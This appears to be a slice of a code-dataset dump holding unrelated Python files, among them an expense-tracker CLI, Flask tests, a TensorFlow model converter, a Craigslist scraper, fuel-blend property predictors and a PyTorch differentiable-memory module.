'Exit',\n# # Separator(),\n# # 'Test 1',\n# ]\n# }\n# ]\n\n\ndef intro():\n questions = [\n {\n 'type': 'list',\n 'name': 'action',\n 'message': 'What do you want to do?',\n 'choices': [\n 'Add a New Expense',\n 'Edit a Current Expense',\n Separator(),\n 'View Expenses',\n 'Delete Expense(s)',\n Separator(),\n 'Insert Test Data', # TODO move to admin interface\n Separator(),\n 'Exit',\n ]\n },\n {\n 'type': 'list',\n 'name': 'view_type',\n 'message': 'What expenses would you like to view?',\n 'choices': [\n 'Current Expenses',\n 'Submitted Expenses',\n 'All Expenses',\n Separator(),\n 'By Card',\n 'By Vendor',\n ],\n 'when': lambda answers: answers['action'] == 'View Expenses',\n },\n ]\n\n answers = prompt(questions)\n\n return 
answers\n\n\ndef new_expense(cards, vendors):\n    questions = [\n        {'type': 'input', 'name': 'date', 'message': 'Expense date?'},\n        {'type': 'input', 'name': 'description',\n         'message': 'Expense description?'},\n        {\n            'type': 'list',\n            'name': 'card',\n            'message': 'Which expense card was used?',\n            'choices': cards\n        },\n        {\n            'type': 'input',\n            'name': 'new_card',\n            'message': 'New card name?',\n            'when': lambda answers: answers['card'] == 'New Card',\n        },\n        {\n            'type': 'list',\n            'name': 'vendor',\n            'message': 'Vendor?',\n            'choices': vendors\n        },\n        {\n            'type': 'input',\n            'name': 'new_vendor',\n            'message': 'New vendor name?',\n            'when': lambda answers: answers['vendor'] == 'New Vendor',\n        },\n        {\n            'type': 'input',\n            'name': 'amount',\n            'message': 'Amount? (excluding $)',\n            'validate': NumberValidator,\n        },\n    ]\n\n    answers = prompt(questions)\n\n    if answers['card'] == 'New Card':\n        answers['card'] = answers['new_card']\n        del answers['new_card']\n\n    if answers['vendor'] == 'New Vendor':\n        answers['vendor'] = answers['new_vendor']\n        del answers['new_vendor']\n\n    return answers\n\n\ndef select_from_list(l, message):\n    questions = [\n        {\n            'type': 'list',\n            'name': 'selection',\n            'message': message,\n            'choices': l,\n        },\n    ]\n\n    answers = prompt(questions)\n\n    return answers\n\n\ndef vendor_expenses(vendors):\n    questions = [\n        {\n            'type': 'list',\n            'name': 'vendor',\n            'message': 'Expense vendor?',\n            'choices': vendors\n        },\n    ]\n\n    answers = prompt(questions)\n\n    return answers\n\n\ndef card_expenses(cards):\n    questions = [\n        {\n            'type': 'list',\n            'name': 'card',\n            'message': 'Card?',\n            'choices': cards\n        },\n    ]\n\n    answers = prompt(questions)\n\n    return answers\n\n\ndef edit_expense(expenses, cards, vendors):\n\n    questions = [\n        {\n            'type': 'list',\n            'name': 'expense',\n            'message': 'What expense would you like to edit?',\n            'choices': expenses\n        },\n        {\n            'type': 'confirm',\n            'message': 'Do you need to update the expense date?',\n            'name': 'update_date',\n            'default': False,\n        },\n        {\n            'type': 'input',\n            'name': 'date',\n            'message': 'What is the updated date?',\n            'when': lambda answers: answers['update_date'] == True\n        },\n        {\n            'type': 'confirm',\n            'message': 'Do you need to update the expense description?',\n            'name': 'update_description',\n            'default': False,\n        },\n        {\n            'type': 'input',\n            'name': 'description',\n            'message': 'What is the updated description?',\n            'when': lambda answers: answers['update_description'] == True\n        },\n        {\n            'type': 'confirm',\n            'message': 'Do you need to update the expense card?',\n            'name': 'update_card',\n            'default': False,\n        },\n        {\n            'type': 'list',\n            'name': 'card',\n            'message': 'Which is the updated card?',\n            'choices': cards,\n            'when': lambda answers: answers['update_card'] == True\n        },\n        {\n            'type': 'input',\n            'name': 'new_card',\n            'message': 'New card name?',\n            'when': lambda answers: answers['update_card'] == True and answers['card'] == 'New Card',\n        },\n        {\n            'type': 'confirm',\n            'message': 'Do you need to update the expense vendor?',\n            'name': 'update_vendor',\n            'default': False,\n        },\n        {\n            'type': 'list',\n            'name': 'vendor',\n            'message': 'What is the updated vendor?',\n            'choices': vendors,\n            'when': lambda answers: answers['update_vendor'] == True\n        },\n        {\n            'type': 'input',\n            'name': 'new_vendor',\n            'message': 'New vendor name?',\n            'when': lambda answers: answers['update_vendor'] == True and answers['vendor'] == 'New Vendor',\n        },\n        {\n            'type': 'confirm',\n            'message': 'Do you need to update the expense amount?',\n            'name': 'update_amount',\n            'default': False,\n        },\n        {\n            'type': 'input',\n            'name': 'amount',\n            'message': 'What is the updated amount (excluding $)?',\n            'when': lambda answers: answers['update_amount'] == True\n        
},\n ]\n\n answers = prompt(questions)\n\n del answers['update_date']\n del answers['update_description']\n del answers['update_card']\n del answers['update_vendor']\n del answers['update_amount']\n\n return answers\n\n\n# def delete_expense(expenses):\n\n# questions = [\n# {\n# 'type': 'list',\n# 'name': 'expense',\n# 'message': 'What expense would you like to delete?',\n# 'choices': expenses\n# },\n# {\n# 'type': 'confirm',\n# 'message': \"Are you sure you want to delete this expense? THIS ACTION CAN'T BE UNDONE!\",\n# 'name': 'delete',\n# 'default': False,\n# },\n# ]\n\n# answers = prompt(questions)\n\n# return answers\n\n\ndef delete_expenses(expenses):\n\n choices = []\n\n for expense in expenses:\n choices.append({'name': expense})\n\n questions = [\n {\n 'type': 'checkbox',\n 'message': 'What expense(s) would you like deleted?',\n 'name': 'expenses',\n 'choices': choices,\n },\n {\n 'type': 'confirm',\n 'message': \"Are you sure you want to delete the selected expense(s)? THIS ACTION CAN'T BE UNDONE!\",\n 'name': 'delete',\n 'default': False,\n },\n ]\n\n answers = prompt(questions)\n\n return answers\n\n\ndef mark_expense_submitted(expenses):\n\n choices = []\n\n for expense in expenses:\n choices.append({'name': expense})\n\n questions = [\n {\n 'type': 'checkbox',\n 'message': 'What expense(s) would you like mark as submitted?',\n 'name': 'expenses',\n 'choices': choices,\n },\n # {\n # 'type': 'confirm',\n # 'message': \"Are you sure you want to mark expense(s) as submitted?\",\n # 'name': 'mark',\n # 'default': False,\n # }\n ]\n\n answers = prompt(questions)\n\n if len(answers['expenses']) < 1:\n return False\n else:\n return answers\n\n\ndef mark_expense_unsubmitted(expenses):\n\n choices = []\n\n for expense in expenses:\n choices.append({'name': expense})\n\n questions = [\n {\n 'type': 'checkbox',\n 'message': 'What expense(s) would you like mark as unsubmitted?',\n 'name': 'expenses',\n 'choices': choices,\n },\n # {\n # 'type': 'confirm',\n # 'message': \"Are you sure you want to mark expense(s) as unsubmitted?\",\n # 'name': 'mark',\n # 'default': False,\n # }\n ]\n\n answers = prompt(questions)\n\n if len(answers['expenses']) < 1:\n return False\n else:\n return answers\n\n\ndef cont_program():\n questions = [\n {\n 'type': 'confirm',\n 'message': \"Would you like to continue using the program?\",\n 'name': 'cont',\n 'default': True,\n },\n ]\n\n answers = prompt(questions)\n\n if answers['cont']:\n return True\n\n return False\n","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":10452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"10713027","text":"from random import randint\r\n\r\nclass Probability:\r\n\r\n def __init__(self, d, i, t, s):\r\n self.d = d\r\n self.i = i\r\n self.t = t\r\n self.s = s\r\n self.a = []\r\n self.z = []\r\n self.p = []\r\n self.n = self.d / self.s\r\n\r\n def calcTries(self):\r\n for x in range(1, self.i + 1):\r\n while True:\r\n r = randint(1, self.d)\r\n if r == self.d:\r\n print(\"iteration: \" + str(x) + \", tries: \" + str(self.t + 1))\r\n self.z.append(self.t + 1)\r\n self.t = 0\r\n break\r\n else:\r\n self.t += 1\r\n\r\n def calcSplit(self):\r\n for x in range(0, self.s + 1):\r\n self.a.append([])\r\n for i in range(len(self.z)):\r\n for j in range(1, self.s + 1):\r\n m = int(self.n * j)\r\n if self.z[i] < m:\r\n self.a[j - 1].append(self.z[i])\r\n elif self.z[i] > self.d:\r\n self.a[self.s].append(self.z[i])\r\n\r\n def 
calcPercentages(self):\r\n for i in range(len(self.a)):\r\n self.p.append(len(self.a[i]) / sum(len(x) for x in self.a) * 100)\r\n print(self.p)\r\n\r\ninit = Probability(300, 10, 0, 7)\r\ninit.calcTries()\r\ninit.calcSplit()\r\nprint(init.a)\r\n\r\n# init.calcPercentages()","sub_path":"probability_v2.py","file_name":"probability_v2.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"631421231","text":"# Copyright 2020, General Electric Company. All rights reserved. See https://github.com/xcist/code/blob/master/LICENSE\n\n###------------ import XCIST-CatSim\nimport catsim as xc\n\n\n##--------- Initialize \nct = xc.CatSim(\"Phantom_Sample\", \"Scanner_Sample_generic\", \"Protocol_Sample_axial\") # initialization\n\n##--------- Make changes to parameters (optional)\nct.resultsName = \"test\"\nct.protocol.viewsPerRotation = 50\nct.protocol.viewCount = ct.protocol.viewsPerRotation\nct.protocol.stopViewId = ct.protocol.viewCount-1\n# ct.protocol.scanTypes = [1, 0, 0] # flags for airscan, offset scan, phantom scan\n# ct.load_cfg(\"Protocol_Sample_axial\", \"Physics_Sample\", \"Recon_Sample_2d\") # new cfg overrides existing parameters\n\n##--------- Run simulation\nct.run_all() # run the scans defined by protocol.scanTypes\n\n\n##--------- Show results\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nprep = xc.rawread(ct.resultsName+'.prep', [ct.protocol.viewCount, ct.scanner.detectorColCount, ct.scanner.detectorRowCount], 'float')\nprep = prep[-1, :, :]\nplt.plot(prep[:, 7])\nplt.show()\n","sub_path":"examples/Sim_Sample.py","file_name":"Sim_Sample.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"402553719","text":"import os\nimport tempfile\n\nfrom flask import request, jsonify\nimport pytest\n\nfrom noodle import create_app as noodle\n\n@pytest.fixture\ndef client():\n \"\"\" Configure the test client \"\"\"\n client = noodle()\n yield client.test_client()\n\ndef test_create_product(client):\n \"\"\" Create a product \"\"\"\n\n json_input = {\"data\":{\"attributes\":{\"name\":\"Sample product\"},\n \"type\":\"products\"}}\n response = client.post('/api/products', json=json_input)\n json_data = response.get_json()['data']['attributes']['name']\n assert json_data == 'Sample product', 'Product name is returned'\n\ndef test_show_product_list(client):\n \"\"\" Show all products \"\"\"\n\n response = client.get('/api/products')\n json_data = response.get_json()\n assert len(json_data) > 0, 'Return all products in the db'\n\ndef test_create_detail(client):\n \"\"\" Create an detail \"\"\"\n\n json_input = {\"data\":{\"attributes\":{\"name\":\"Sample detail\"},\n \"type\":\"details\"}}\n response = client.post('/api/details', json=json_input)\n json_data = response.get_json()['data']['attributes']['name']\n assert json_data == 'Sample detail', 'detail name is returned'\n\ndef test_show_detail_list(client):\n \"\"\" Show all details \"\"\"\n\n response = client.get('/api/details')\n json_data = response.get_json()\n assert len(json_data) > 0, 'Return all details in the db'\n","sub_path":"noodle-product-manager-server/tests/test_noodle.py","file_name":"test_noodle.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306821418","text":"from django import forms\nfrom django.forms import ModelForm\n\nfrom 
.models import Question\n\n\n\nclass DateInput(forms.DateInput):\n    input_type = 'date'\n\nclass DateTimeInput(forms.DateTimeInput):\n    input_type = 'datetime-local'\n\nclass QuestionForm(ModelForm):\n\n    class Meta:\n        model = Question\n        fields = ['question_text', 'pub_date']\n        widgets = {\n            'pub_date': DateInput(attrs={'type': 'date'}),\n        }","sub_path":"polls/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"99143190","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom pprint import pprint\nfrom urlparse import urljoin\nimport dataset\n\ndb = dataset.connect('sqlite:///missed_connections.db')\n\nBASE_URL = 'http://charlotte.craigslist.org'\n\ndef scrape_missed_connections():\n    \"\"\" Scrape all the missed connections from a list \"\"\"\n\n    response = requests.get(BASE_URL + \"/search/mis?query=w4m\")\n\n    soup = BeautifulSoup(response.content)\n\n    missed_connections = soup.find_all('span', {'class':'pl'})\n\n    for x in missed_connections:\n\n        link = x.find('a').attrs['href']\n\n        url = urljoin(BASE_URL, link)\n\n        scrape_missed_connection(url)\n\ndef scrape_missed_connection(url):\n    \"\"\" Extract information from a missed connection's page. \"\"\"\n\n    response = requests.get(url)\n\n    soup = BeautifulSoup(response.content)\n\n    data = {\n        'source_url': url,\n        'subject': soup.find('h2', {'class':'postingtitle'}).text.strip(),\n        'body': soup.find('section', {'id':'postingbody'}).text.strip(),\n        'datetime': soup.find('time').attrs['datetime']\n    }\n\n    pprint(data)\n    db['posts'].upsert(data, ['source_url'])\n\nif __name__ == '__main__':\n    scrape_missed_connections()\n","sub_path":"missed_connections.py","file_name":"missed_connections.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"427177688","text":"import requests\nimport json\nimport pandas as pd\nfrom multiprocessing import pool\n\nerror_id = []\n\nBASE_URL = 'http://127.0.0.1:5001/api/query/business_poly/?poly={geom}'\npath = r'E:\\project\\request\\test.xlsx'\ngeoms = pd.read_excel(path)  # read the geometry info\n\n\ndef get_data(geoms, dataframe):\n    for index, row in geoms.iterrows():\n        url = BASE_URL.format(geom=row['geom'])\n        r = requests.get(url)\n        print('Processing {}'.format(row['shangquan_id']))\n        if r.status_code == 200:\n            c = json.loads(r.text)\n            c['data']['city'] = row['city']\n            c['data']['shangquan_id'] = row['shangquan_id']\n            dataframe = dataframe.append(c['data'], ignore_index=True)\n        else:\n            error_id.append(row['shangquan_id'])\n\n    dataframe.to_excel(\"test.xlsx\")\n    print(error_id)\n\n\nif __name__ == '__main__':\n    d = pd.DataFrame(columns=['city', 'shangquan_id', 'biz_mature_score', 'residencial_score', 'food_competing_score',\n                              'cloth_competing_score', 'child_competing_score',\n                              'service_competing_score', 'entertainment_competing_score',\n                              'transportation_score', 'cluster_score', 'spending_score'])\n    geoms = pd.read_excel(path)\n    get_data(geoms, d)\n","sub_path":"request/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"558729961","text":"\nclass interface:\n    def Menu(self, obj):\n\n        obj.viewComposer()\n\n        print('Composers which have songs = 4 minutes')\n        obj.searchComposer()\n\n        print('if you want to add composer 1')\n        print('if you want to change composer or songs 2')\n
delete composer 3')\n print('if you want to add song 4')\n buf=input()\n if buf==1:\n print('Enter name of composer')\n name=raw_input()\n print('Enter age of composer')\n age=input()\n obj.newComposer(name, age)\n elif buf==2:\n obj.changeComposer()\n elif buf==3:\n print('Enter name of composer')\n name_composer=raw_input()\n obj.delComposers(name_composer)\n elif buf==4:\n name_c = raw_input('Enter name of composer')\n name = raw_input('Enter name of song')\n ganre = raw_input('Enter ganre ')\n time = input('Enter time')\n obj.newSong(name_c, name, ganre, time)\n elif buf==5 :\n return(0)\n return(1)\n","sub_path":"Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"209511879","text":"import tensorflow as tf\nimport os\nimport shutil\nfrom tensorflow.python.saved_model import tag_constants\nfrom tensorflow.python.tools import freeze_graph\nfrom tensorflow.python import ops\nfrom tensorflow.tools.graph_transforms import TransformGraph\n\n\ndef get_graph_def_from_file(graph_filepath):\n tf.reset_default_graph()\n with ops.Graph().as_default():\n with tf.gfile.GFile(graph_filepath, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n return graph_def\n\n\ndef convert_graph_def_to_saved_model(export_dir, graph_filepath, input_name, outputs):\n graph_def = get_graph_def_from_file(graph_filepath)\n with tf.Session(graph=tf.Graph()) as session:\n tf.import_graph_def(graph_def, name='')\n tf.compat.v1.saved_model.simple_save(\n session,\n export_dir,# change input_image to node.name if you know the name\n inputs={input_name: session.graph.get_tensor_by_name('{}:0'.format(node.name))\n for node in graph_def.node if node.op=='Placeholder'},\n outputs={t.rstrip(\":0\"):session.graph.get_tensor_by_name(t) for t in outputs}\n )\n print('Optimized graph converted to SavedModel!')\n\ntf.compat.v1.enable_eager_execution()\n\n# Look up the name of the placeholder for the input node\ngraph_def=get_graph_def_from_file('./frozen_inference_graph.pb')\ninput_name=\"\"\nfor node in graph_def.node:\n if node.op=='Placeholder':\n print(\"##### frozen_inference_graph - Input Node Name #####\", node.name) # this will be the input node\n input_name=node.name\n\n# mobilenetv2_fsd2018_41cls output names\noutputs = ['raw_outputs/box_encodings:0','raw_outputs/class_predictions:0']\n\n# convert this to a TF Serving compatible mode - mobilenetv2_fsd2018_41cls\nshutil.rmtree('./saved_model', ignore_errors=True)\nconvert_graph_def_to_saved_model('./saved_model', './tflite_graph.pb', input_name, outputs)\n","sub_path":"002_mobilenetv3-ssd/02_mobilenetv3_large/01_coco/01_float/01_freeze_the_saved_model_v1.py","file_name":"01_freeze_the_saved_model_v1.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"449827928","text":"import sys\ninput = sys.stdin.readline\n\n\nn, k = map(int, input().split())\nf = list(map(int, input().split()))\nfreq = {}\nl, c = 0, 0\nfor r in range(n):\n if f[r] not in freq:\n freq[f[r]] = 0\n freq[f[r]] += 1\n while len(freq) >= k:\n l += 1\n freq[f[l - 1]] -= 1\n if not freq[f[l - 1]]:\n del freq[f[l - 1]]\n c += l\nprint(c)\n","sub_path":"DMOJ/Other (APIO, COCI DWITE, ect.)/Smarties.py","file_name":"Smarties.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} 
+{"seq_id":"247795582","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# ecpredict/blend_predict.py\n# v.0.1.4\n# Developed in 2020 by Travis Kessler \n#\n# Contains function for predicting properties of multi-component blends\n#\n\nfrom math import sqrt\n\nfrom ecpredict.utils.loc_errors import TEST_MED_ABS_ERRORS\nfrom ecpredict.utils.project import get_prj\nfrom ecpredict.predict import lower_heating_value\nfrom ecpredict.utils.equations import _celsius_to_rankine, _linear_blend_ave,\\\n _linear_blend_err, _linear_blend_err_multi, _rankine_to_celsius\n\nfrom padelpy import from_smiles\n\n\ndef cetane_number_blend(smiles_and_vals: tuple, proportions: tuple,\n backend: str = 'padel') -> tuple:\n\n trained_prj = get_prj('CN', backend)\n cn_values = []\n omit = []\n for item in smiles_and_vals:\n if type(item) is str:\n cn_values.append(trained_prj.use([item], backend)[0])\n omit.append(False)\n else:\n cn_values.append(item)\n omit.append(True)\n return (_linear_blend_ave(cn_values, proportions),\n _linear_blend_err(TEST_MED_ABS_ERRORS['CN_{}'.format(backend)],\n proportions, omit))\n\n\ndef cloud_point_blend(smiles_and_vals: tuple, proportions: tuple,\n backend: str = 'padel') -> tuple:\n\n trained_prj = get_prj('CP', backend)\n cp_values = []\n for item in smiles_and_vals:\n if type(item) is str:\n cp_values.append(_celsius_to_rankine(\n trained_prj.use([item], backend)[0]\n ))\n else:\n cp_values.append(_celsius_to_rankine(item))\n cp_sum = 0\n for idx, val in enumerate(cp_values):\n cp_sum += (proportions[idx] * val**13.45)\n return _rankine_to_celsius(cp_sum**(1 / 13.45))\n\n\ndef lower_heating_value_blend(smiles_and_vals: tuple,\n proportions: tuple) -> tuple:\n\n vals = []\n errors = []\n omit = []\n for smi in smiles_and_vals:\n if type(smi) is str:\n v, e = lower_heating_value([smi])\n vals.append(v[0])\n errors.append(e[0])\n omit.append(False)\n else:\n vals.append(smi)\n errors.append(0)\n omit.append(True)\n res_val = _linear_blend_ave(vals, proportions)\n res_error = _linear_blend_err_multi(errors, proportions, omit)\n return (res_val, res_error)\n\n\ndef kinematic_viscosity_blend(smiles_and_vals: tuple, proportions: tuple,\n backend: str = 'padel') -> tuple:\n\n trained_prj = get_prj('KV', backend)\n kv_vals = []\n omit = []\n for item in smiles_and_vals:\n if type(item) is str:\n kv_vals.append(trained_prj.use([item], backend)[0])\n omit.append(False)\n else:\n kv_vals.append(item)\n omit.append(True)\n return (_linear_blend_ave(kv_vals, proportions),\n _linear_blend_err(TEST_MED_ABS_ERRORS['KV_{}'.format(backend)],\n proportions, omit))\n\n\ndef yield_sooting_index_blend(smiles_and_vals: tuple, proportions: tuple,\n backend: str = 'padel') -> tuple:\n\n trained_prj = get_prj('YSI', backend)\n ysi_values = []\n omit = []\n for item in smiles_and_vals:\n if type(item) is str:\n ysi_values.append(trained_prj.use([item], backend)[0])\n omit.append(False)\n else:\n ysi_values.append(item)\n omit.append(True)\n return (_linear_blend_ave(ysi_values, proportions),\n _linear_blend_err(TEST_MED_ABS_ERRORS['YSI_{}'.format(backend)],\n proportions, omit))\n","sub_path":"ecpredict/blend_predict.py","file_name":"blend_predict.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"315800025","text":"import os\n\nfrom subprocess import Popen\n# taken from:\n# http://www.swag.dk/pub/djangobook-pdf/\n# needs pdftk and htmldoc installed\n\npdfs = []\n\nfor i in xrange(1, 21):\n p = 
Popen(['htmldoc', '--webpage', '-f', '%d.pdf' % i, \n 'http://www.djangobook.com/en/2.0/chapter%02d/' % i])\n p.wait()\n\n if p.returncode == 0:\n if os.path.exists('%d.pdf' % i):\n pdfs.append('%d.pdf' % i)\n\nif len(pdfs) > 0:\n cmds = ['pdftk']\n cmds.extend(pdfs)\n cmds.extend(['cat', 'output', 'djangobook_all.pdf'])\n p = Popen(cmds)\n p.wait()\n","sub_path":"djangobookgen.py","file_name":"djangobookgen.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"136464523","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport generators as gen\nfrom torch.utils.data import DataLoader\nfrom utils import *\n\n\neps = 10e-6\n\n\nclass Controller(nn.Module):\n def __init__(self,\n batch_size=32,\n num_reads=2,\n num_layers=2,\n input_size=None,\n word_size=4,\n output_size=24,\n hidden_size=250):\n super(Controller, self).__init__()\n self.num_layers = num_layers\n self.batch_size = batch_size\n self.num_hidden = hidden_size\n if input_size is not None:\n self._insize = input_size\n else:\n self._insize = word_size + word_size * num_reads\n #state\n # print(\"controller {}, {}, {} -> out:{}\".format(\n # word_size, hidden_size, num_layers, output_size))\n self.lst1 = nn.LSTM(input_size=self._insize, #word_size,\n hidden_size=hidden_size,\n num_layers=num_layers,\n batch_first=True)\n\n self.lst2 = nn.LSTM(input_size=hidden_size, #word_size,\n hidden_size=output_size,\n num_layers=1,\n batch_first=True)\n self.map_to_output = nn.Linear(hidden_size, output_size)\n # print(\"lstm\", self.lst1)\n # self.interface_weights = Variable(torch.FloatTensor(output_size - word_size, batch_size).uniform_(0, 1))\n # self.read_weights = Variable(torch.FloatTensor(word_size, batch_size).uniform_(0, 1))\n\n def forward(self, inputs, previous_controller_state):\n \"\"\"Generate interface and output vector\n \"\"\"\n h1, h2 = previous_controller_state\n print(inputs.size(), h1.size(), h2.size())\n inputs = inputs.unsqueeze(1)\n lstm_out, controller_state = self.lst1(inputs, previous_controller_state)\n\n outputs = self.map_to_output(lstm_out).squeeze(1)\n\n #read_outputs = outputs.matmul(self.read_weights)\n #interface = outputs.matmul(self.interface_weights)\n\n #print(\"read_outputs\", read_outputs.size())\n #print(\"interface\", interface.size())\n return outputs, controller_state\n\n\n\nclass Usage(nn.Module):\n def __init__(self, memory_size=100):\n super(Usage, self).__init__()\n self._memory_size = memory_size\n\n\n def _usage_after_write(self, prev_usage, write_weights):\n \"\"\"Calcualtes the new usage after writing to memory.\n\n Args:\n prev_usage: tensor of shape `[batch_size, memory_size]`.\n write_weights: tensor of shape `[batch_size, num_writes, memory_size]`.\n\n Returns:\n New usage, a tensor of shape `[batch_size, memory_size]`.\n \"\"\"\n # Calculate the aggregated effect of all write heads\n write_weights = 1 - (1 - write_weights).prod(1)\n return prev_usage + (1 - prev_usage) * write_weights\n\n def _usage_after_read(self, prev_usage, free_gate, read_weights):\n \"\"\"Calcualtes the new usage after reading and freeing from memory.\n\n Args:\n prev_usage: tensor of shape `[batch_size, memory_size]`.\n\n free_gate: tensor of shape `[batch_size, num_reads]`\n\n with entries in therange [0, 1] indicating the amount that locations\n read from can be freed.\n read_weights: tensor of shape `[batch_size, num_reads, memory_size]`.\n\n 
Returns:\n New usage, a tensor of shape `[batch_size, memory_size]`.\n \"\"\"\n\n free_gate = free_gate.unsqueeze(-1)\n free_read_weights = 1 - free_gate * read_weights\n phi = free_read_weights.prod(1)\n return prev_usage * phi\n\n def forward(self, write_weights, free_gate, read_weights, prev_usage):\n \"\"\"\n Args:\n write_weights: tensor of shape `[batch_size, num_writes, memory_size]`\n giving write weights at previous time step.\n free_gate: tensor of shape `[batch_size, num_reads]` which indicates\n which read heads read memory that can now be freed.\n read_weights: tensor of shape `[batch_size, num_reads, memory_size]`\n giving read weights at previous time step.\n prev_usage: tensor of shape `[batch_size, memory_size]` giving\n usage u_{t - 1} at the previous time step, with entries in range\n [0, 1].\n\n Return tensor of shape `[batch_size, memory_size]`\n \"\"\"\n write_weights = write_weights.detach()\n usage = self._usage_after_write(prev_usage, write_weights)\n usage = self._usage_after_read(usage, free_gate, read_weights)\n return usage\n\nclass Linkage(nn.Module):\n def __init__(self, memory_size=100, num_writes=1):\n super(Linkage, self).__init__()\n self._memory_size = memory_size\n self._num_writes = num_writes # todo\n\n def _precedence_weights(self, prev_precedence_weights, write_weights):\n \"\"\"Calculates the new precedence weights given the current write weights.\n\n The precedence weights are the \"aggregated write weights\" for each write\n head, where write weights with sum close to zero will leave the precedence\n weights unchanged, but with sum close to one will replace the precedence\n weights.\n\n Args:\n prev_precedence_weights: A tensor of shape `[batch_size, num_writes,\n memory_size]` containing the previous precedence weights.\n write_weights: A tensor of shape `[batch_size, num_writes, memory_size]`\n containing the new write weights.\n\n Returns:\n A tensor of shape `[batch_size, num_writes, memory_size]` containing the\n new precedence weights.\n \"\"\"\n write_sum = write_weights.sum(2, keepdim=True)\n return (1 - write_sum) * prev_precedence_weights + write_weights\n\n def _link(self, prev_link, prev_precedence_weights, write_weights):\n \"\"\"Calculates the new link graphs.\n\n For each write head, the link is a directed graph (represented by a matrix\n with entries in range [0, 1]) whose vertices are the memory locations, and\n an edge indicates temporal ordering of writes.\n\n Args:\n prev_link:\n A tensor of shape `[batch_size, num_writes, memory_size, memory_size]`\n representing the previous link graphs for each write head.\n prev_precedence_weights:\n A tensor of shape `[batch_size, num_writes, memory_size]`\n which is the previous \"aggregated\" write weights for each write head.\n write_weights:\n A tensor of shape `[batch_size, num_writes, memory_size]`\n containing the new locations in memory written to.\n\n Returns:\n A tensor of shape `[batch_size, num_writes, memory_size, memory_size]`\n containing the new link graphs for each write head.\n \"\"\"\n\n #batch_size = prev_link.size(0)\n write_weights_i = write_weights.unsqueeze(3)\n write_weights_j = write_weights.unsqueeze(2)\n\n prev_precedence_weights_j = prev_precedence_weights.unsqueeze(2)\n prev_link_scale = 1 - write_weights_i - write_weights_j\n new_link = write_weights_i * prev_precedence_weights_j\n #scale old links, and add new links\n link = prev_link_scale * prev_link + new_link\n return link\n\n def forward(self, write_weights, prev_state):\n \"\"\"Calculate the updated 
linkage state given the write weights.\n\n Args:\n write_weights: A tensor of shape `[batch_size, num_writes, memory_size]`\n containing the memory addresses of the different write heads.\n prev_state: `TemporalLinkageState` tuple containg a tensor `link` of\n shape `[batch_size, num_writes, memory_size, memory_size]`, and a\n tensor `precedence_weights` of shape `[batch_size, num_writes,\n memory_size]` containing the aggregated history of recent writes.\n\n Returns:\n A `TemporalLinkageState` tuple `next_state`, which contains the updated\n link and precedence weights.\n \"\"\"\n prev_link, prev_precedence_weights = prev_state\n assert list(write_weights.size()[1:]) == [1, self._memory_size]\n\n link = self._link(prev_link, prev_precedence_weights, write_weights)\n precedence_weights = self._precedence_weights(prev_precedence_weights, write_weights)\n\n assert list(link.size()[1:]) == [1, self._memory_size, self._memory_size]\n assert list(precedence_weights.size()[1:]) == [1, self._memory_size]\n return link, precedence_weights\n\n\nclass BatchSoftmax(nn.Module):\n def forward(self, input_):\n batch_size = input_.size(0)\n output_ = torch.stack([F.softmax(input_[i]) for i in range(batch_size)], 0)\n return output_\n\n\nclass WeightFn(nn.Module):\n def __init__(self, word_size=32, num_heads=1):\n super(WeightFn, self).__init__()\n self._num_heads = num_heads\n self._word_size = word_size\n self._strength_op = nn.Softplus()\n self.softmax = BatchSoftmax()\n\n def _vector_norms(self, m):\n mem_squared = m * m\n squared_norms = mem_squared.sum(2, keepdim=True) + eps\n return squared_norms.sqrt()\n\n def forward(self, inputs):\n \"\"\"Connects the CosineWeights module into the graph.\n\n Args:\n memory: A 3-D tensor of shape `[batch_size, memory_size, word_size]`.\n keys: A 3-D tensor of shape `[batch_size, num_heads, word_size]`.\n strengths: A 2-D tensor of shape `[batch_size, num_heads]`.\n\n Returns:\n Weights tensor of shape `[batch_size, num_heads, memory_size]`.\n \"\"\"\n memory, keys, strengths = inputs\n assert list(memory.size())[2] == self._word_size\n assert list(keys.size())[1:] == [self._num_heads, self._word_size]\n assert list(strengths.size())[1:] == [self._num_heads]\n\n # Calculates the inner product between the query vector and words in memory.\n dot = keys.bmm(memory.transpose(1, 2))\n\n # Outer product to compute denominator (euclidean norm of query and memory).\n memory_norms = self._vector_norms(memory)\n key_norms = self._vector_norms(keys)\n norm = key_norms.bmm(memory_norms.transpose(1, 2))\n\n # Calculates cosine similarity between the query vector and words in memory.\n activations = dot / (norm + 